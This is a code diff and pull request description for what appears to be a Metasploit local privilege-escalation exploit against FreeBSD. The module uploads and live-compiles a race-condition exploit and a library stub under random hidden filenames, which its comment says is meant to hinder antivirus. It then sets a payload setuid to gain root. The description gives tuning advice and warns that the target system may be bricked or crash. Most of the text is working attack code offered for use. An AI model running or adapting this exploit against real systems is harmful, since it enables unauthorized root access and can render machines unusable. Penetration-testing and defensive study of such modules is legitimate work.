+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    # Check if we're already root
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override'
+      end
+    end
+
+    # Make sure we can write our exploit and payload to the remote system
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    p = store_loot('libmap.conf', 'text/plain', datastore['RHOST'], read_file('/etc/libmap.conf'), 'Backup of libmap.conf')
+    print_status 'Stored /etc/libmap.conf in loot.  If session cleanup is unsuccessful, system will brick. Use this to unbrick'
+
+    # Upload payload executable
+    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+    executable_path = "#{base_dir}/#{executable_name}"
+    stub_name = ".#{rand_text_alphanumeric(5..10)}"
+    stub_path = "#{base_dir}/#{stub_name}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile executable_path, strip_comments(exploit_data('heavy_cyber_weapon.c')), "cc -o #{executable_path} -lpthread #{executable_path}.c"
+      rm_f "#{executable_path}.c"
+      stub = exploit_data('program.c').gsub('/tmp/xxxx', payload_path)
+      upload_and_compile stub_path, strip_comments(stub), "cc -o #{stub_path}.o -c #{stub_path}.c -fPIC"
+      cmd_exec "cc -shared -Wl,-soname,libno_ex.so.1 -o #{base_dir}/libno_ex.so.1.0 #{stub_path}.o -nostartfiles"
+      rm_f "#{stub_path}.c"
+      rm_f "#{stub_path}.o"
+
+      runner_name = ".#{rand_text_alphanumeric(5..10)}.sh"
+      runner_path = "#{base_dir}/#{runner_name}"
+      runner = %Q{#!/bin/bash
+#{executable_path}
+su
+#{payload_path}
+}
+      upload_and_chmodx runner_path, runner
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      vprint_error 'not created yet'
+      return 0
+      #upload_and_chmodx executable_path, exploit_data('example')
+    end
+
+    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+    # output from the exploit being run, they can optionally see it
+    timeout = 3600 #60min
+    print_status "Launching exploit... May take up to 60 minutes. Start time: #{Time.now}"
+    output = cmd_exec "#{runner_path}", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+    if setuid?(payload_path)
+      print_good 'Payload suid set, launching root payload'
+      cmd_exec 'su'
+      cmd_exec payload_path
+    else
+      print_error("no suid on #{payload_path}")
+    end
+    print_status 'Performing Cleanup'
+    #rm_f stub_path
+    #rm_f payload_path
+    #rm_f executable_path
+    #rm_f runner_path
+
+    rm_f '/tmp/dummy'
+    rm_f '/tmp/dummy2'
+    rm_f '/tmp/pwn'
+    rm_f '/tmp/pwn2'
+    rm_f '/tmp/sync_forks'
+    rm_f '/tmp/sync_forks1'
+    rm_f '/tmp/sync_forks2'
+    rm_f '/tmp/sync_forks3'
+
+    def on_new_session
+      print_good 'Replacing /etc/libmap.conf with /tmp/libmap.conf to prevent bricking system'
+      cmd_exec 'cp /tmp/libmap.conf /etc/libmap.conf'
+    end
+  end
+end


### PR DESCRIPTION
One of the exploits for #12774

This exploit is temperamental.  `kern.maxfiles` seems to be sensitive, I had 100% success with 70000 but something lower will most likely crash the box.

### Oddities:
1. If the output of the exploit isn't redirected somewhere (a file, or `/dev/null`, I was getting a fail/reboot every time)
2. Attempts to just `suid` the payload and launch it never succeeded (box didn't crash, but no gained privileges).  While I hate to copy a binary and suid it, just to run the payload... I couldn't get a reliable exploit w/o it.
3. Attempts to automate cleanup where /etc/libmap.conf was restored seemed to always fail.  I tried to write the file, copy the file, loop copying it with timeouts, and a whole bunch of other methods that seemed logical.  They never seemed to work.  The command being run by hand does though, but is critical to prevent BRICKING THE BOX.
4. Execution time for 70000 `maxfiles` was only 20min, but @bcoles and I had some wild results depending on that, so you may see up to 60min.
5. Since freebsd has `cc` by default, I decided to just leave compiling live on the system, and not drop a binary.  This exploit is chaotic enough, felt like a bad idea to not compile live.


# Testing
See markdown docs! Pretty standard.  From a root shell do `sysctl kern.maxfiles=70000` (or live on the wild side and set/keep it lower). Then exploit away!